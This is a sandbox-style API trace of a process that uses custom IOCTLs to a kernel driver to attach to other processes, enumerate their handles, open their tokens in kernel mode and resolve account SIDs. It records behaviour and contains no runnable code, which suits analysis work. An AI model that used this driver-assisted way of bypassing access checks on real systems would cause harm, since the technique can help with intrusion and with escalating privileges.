Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.493] PsAcquireProcessExitSynchronization () returned 0x0 [0225.493] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0) [0225.493] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0225.493] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.493] PsReleaseProcessExitSynchronization () returned 0x2 [0225.493] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0225.493] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.493] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0225.493] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.493] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.493] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.493] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.493] PsLookupProcessByProcessId (in: ProcessId=0x588, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.493] PsAcquireProcessExitSynchronization () returned 0x0 [0225.493] KeStackAttachProcess (in: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036a4060, ApcState=0xfffff880052b35d0) [0225.493] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.493] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.494] PsReleaseProcessExitSynchronization () returned 0x2 [0225.494] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0225.494] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.494] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.494] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.494] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xc8 [0225.494] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.494] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001e8a630, HandleInformation=0x0) returned 0x0 [0225.494] ObOpenObjectByPointer (in: Object=0xfffffa8001e8a630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.494] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x14 [0225.494] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.494] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.494] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.495] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.495] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.496] CloseHandle (hObject=0xc4) returned 1 [0225.496] CloseHandle (hObject=0xc8) returned 1 [0225.497] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.497] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.497] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.497] PsAcquireProcessExitSynchronization () returned 0x0 [0225.497] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880052b35d0) [0225.497] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001eb7830, HandleInformation=0x0) returned 0x0 [0225.497] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.497] PsReleaseProcessExitSynchronization () returned 0x2 [0225.497] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0225.497] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.497] ObfDereferenceObject (Object=0xfffffa8001eb7830) returned 0x1 [0225.497] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.497] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.497] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.497] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0225.497] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.497] PsAcquireProcessExitSynchronization () returned 0x0 [0225.497] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880052b35d0) [0225.497] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e9e2b0, HandleInformation=0x0) returned 0x0 [0225.497] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.497] PsReleaseProcessExitSynchronization () returned 0x2 [0225.497] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0225.497] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.498] ObfDereferenceObject (Object=0xfffffa8001e9e2b0) returned 0x1 [0225.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.498] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.498] PsLookupProcessByProcessId (in: ProcessId=0x6fc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.498] PsAcquireProcessExitSynchronization () returned 0x0 [0225.498] KeStackAttachProcess (in: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001e8a630, ApcState=0xfffff880052b35d0) [0225.498] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.498] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.498] PsReleaseProcessExitSynchronization () returned 0x2 [0225.498] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x12 [0225.498] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.498] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.498] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.498] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xc8 [0225.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.498] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001fccb30, HandleInformation=0x0) returned 0x0 [0225.498] ObOpenObjectByPointer (in: Object=0xfffffa8001fccb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.498] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x14 [0225.498] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.498] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.499] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.499] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.499] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.500] CloseHandle (hObject=0xc4) returned 1 [0225.500] CloseHandle (hObject=0xc8) returned 1 [0225.501] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.501] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.501] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.501] PsAcquireProcessExitSynchronization () returned 0x0 [0225.501] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880052b35d0) [0225.501] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fc9c50, HandleInformation=0x0) returned 0x0 [0225.501] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.501] PsReleaseProcessExitSynchronization () returned 0x2 [0225.501] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0225.501] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.501] ObfDereferenceObject (Object=0xfffffa8001fc9c50) returned 0x1 [0225.501] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.501] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.501] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.501] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0225.501] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.501] PsAcquireProcessExitSynchronization () returned 0x0 [0225.502] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880052b35d0) [0225.502] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fca500, HandleInformation=0x0) returned 0x0 [0225.502] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.502] PsReleaseProcessExitSynchronization () returned 0x2 [0225.502] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0225.502] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.502] ObfDereferenceObject (Object=0xfffffa8001fca500) returned 0x1 [0225.502] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.502] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.502] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.502] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.502] PsLookupProcessByProcessId (in: ProcessId=0xc4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.502] PsAcquireProcessExitSynchronization () returned 0x0 [0225.502] KeStackAttachProcess (in: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fccb30, ApcState=0xfffff880052b35d0) [0225.502] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.502] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.502] PsReleaseProcessExitSynchronization () returned 0x2 [0225.502] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x12 [0225.502] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.502] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.502] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.503] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x70c) returned 0xc8 [0225.503] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.503] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001feeb30, HandleInformation=0x0) returned 0x0 [0225.503] ObOpenObjectByPointer (in: Object=0xfffffa8001feeb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.503] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x14 [0225.503] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.503] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.503] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.503] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.503] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.505] CloseHandle (hObject=0xc4) returned 1 [0225.505] CloseHandle (hObject=0xc8) returned 1 [0225.505] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.505] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0225.505] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.505] PsAcquireProcessExitSynchronization () returned 0x0 [0225.505] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880052b35d0) [0225.506] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a90530, HandleInformation=0x0) returned 0x0 [0225.506] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.506] PsReleaseProcessExitSynchronization () returned 0x2 [0225.506] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0225.506] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.506] ObfDereferenceObject (Object=0xfffffa8003a90530) returned 0x1 [0225.506] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.506] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.506] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.506] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0225.506] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.506] PsAcquireProcessExitSynchronization () returned 0x0 [0225.506] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880052b35d0) [0225.506] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fdbf20, HandleInformation=0x0) returned 0x0 [0225.506] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.506] PsReleaseProcessExitSynchronization () returned 0x2 [0225.506] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0225.506] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.506] ObfDereferenceObject (Object=0xfffffa8001fdbf20) returned 0x1 [0225.506] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.506] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.506] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.506] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.506] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.507] PsAcquireProcessExitSynchronization () returned 0x0 [0225.507] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880052b35d0) [0225.507] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0225.507] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.507] PsReleaseProcessExitSynchronization () returned 0x2 [0225.507] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0225.507] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.507] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0225.507] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.507] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x434) returned 0xc8 [0225.507] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.507] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002005b30, HandleInformation=0x0) returned 0x0 [0225.507] ObOpenObjectByPointer (in: Object=0xfffffa8002005b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.507] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x14 [0225.507] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.507] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.507] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) 